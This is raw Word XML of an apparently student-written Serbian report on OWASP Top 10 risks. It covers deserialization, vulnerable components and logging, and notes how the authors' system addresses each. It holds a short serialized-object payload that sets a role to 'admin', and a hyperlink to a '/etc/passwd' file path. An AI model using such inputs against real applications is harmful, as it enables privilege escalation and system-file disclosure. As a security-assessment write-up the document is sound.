          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">U našem sistemu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">podatke smeštamo u bazu podataka,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>zbog čega se ne vrši serijalizacija/deserijalizacija podataka, te nema rizika da ova vrsta napada bude realizovana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t xml:space="preserve">Using Components with </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Known Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Sve komponente u aplikaciji (biblioteke, frameworks-i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">i ostali softverski moduli) pokreću se sa istim privilegijama. Eksploatacija ranjivih komponenti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>može uzrokovati gubitak podataka ili preuzimanje servera. Korišćenje komponenti sa poznatim manama mogu oslabiti zaštitu aplikacije te ona postaje podložna uti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">caju različitih napada. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>S obzirom na to da se sve komponente pokreću u istom režimu, greška u bilo kojoj od njih za posledicu bi imala ozbiljan negativan uticaj na aplikaciju. Održavanje i odbranu IoT sistema je teško implementirati, ali oni imaj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>u važan uticaj u sferama u kojima se primenjuju (biomedicina, automobilska industrija i sl).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">U našem sistemu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>moguće je sprovesti napade iz ove grupe. Kako bismo ih sveli na minimum, napravićemo spisak korišćenih bibliotek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> i njihovih ranjivosti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1108"/>
        <w:gridCol w:w="8243"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="54"/>
                <w:szCs w:val="54"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8242" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Insufficient Logging &amp; Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Neadekvatno nadgledanje i beleženje aktivnosti u aplikaciji dozvoljava napadačima dalekosežnije napade na sistem koji mogu dovesti do potpunog uništavanja podataka. Većina sprovedenih studija pokazala je da će posledice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">ove grupe napada pre otkriti eksterni subjekti nego interno praćenje. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Napadač pokušava da preuzme sve korisničke naloge oslanjajući se na najčešće korišćenu lozinku. Ovakav napad bi u log fajl upisao samo jedan neuspešan pokušaj logovanja za svak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>og korisnika, tako da je napadaču ostavljena mogućnost da sve ovo ponovi kroz par dana ali sa drugom lozinkom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">U našem sistemu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">beleže se kritične operacije, kao što su (ne)uspeli pokušaji logovanja </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>(prijava, odjava, registracija na sistem)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>, promena lozin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">ke, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>resetovanje lozinke,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>blokiranje</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">aktiviranje/uklanjanje korisnika od strane administratora </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>pomoću Logger klase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>Za</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> svaku izvršenu akciju, beleži se korisničko ime/id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>, akcija i tačan datum njenog izvršavanja</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AC4948" w:rsidSect="00AC4948">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417"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Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="EE"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>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C4948"/>
    <w:rsid w:val="00071411"/>
    <w:rsid w:val="004A72BC"/>
    <w:rsid w:val="00AC49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0BB"/>
    <w:pPr>
      <w:spacing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687F09"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00345604"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel1">
    <w:name w:val="ListLabel 1"/>
    <w:qFormat/>
    <w:rsid w:val="00AC4948"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel2">
    <w:name w:val="ListLabel 2"/>
    <w:qFormat/>
    <w:rsid w:val="00AC4948"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel3">
    <w:name w:val="ListLabel 3"/>
    <w:qFormat/>
    <w:rsid w:val="00AC4948"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:qFormat/>
    <w:rsid w:val="00AC4948"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:rsid w:val="00AC4948"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Microsoft YaHei" w:hAnsi="Liberation Sans" w:cs="Arial"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00AC4948"/>
    <w:pPr>
      <w:spacing w:after="140" w:line="288" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="BodyText"/>
    <w:rsid w:val="00AC4948"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00AC4948"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00AC4948"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CB782C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:qFormat/>
    <w:rsid w:val="00E47D39"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="001656E6"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="SimSun" w:hAnsi="Times New Roman" w:cs="Mangal"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00BE57E5"/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1"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qFormat/>
    <w:rsid w:val="00345604"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="006C78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file:///C:\etc\passwd"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785</TotalTime>
  <Pages>13</Pages>
  <Words>1782</Words>
  <Characters>10162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11921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lupic</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Nena</cp:lastModifiedBy>
  <cp:revision>61</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-18T12:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-29T17:37:00Z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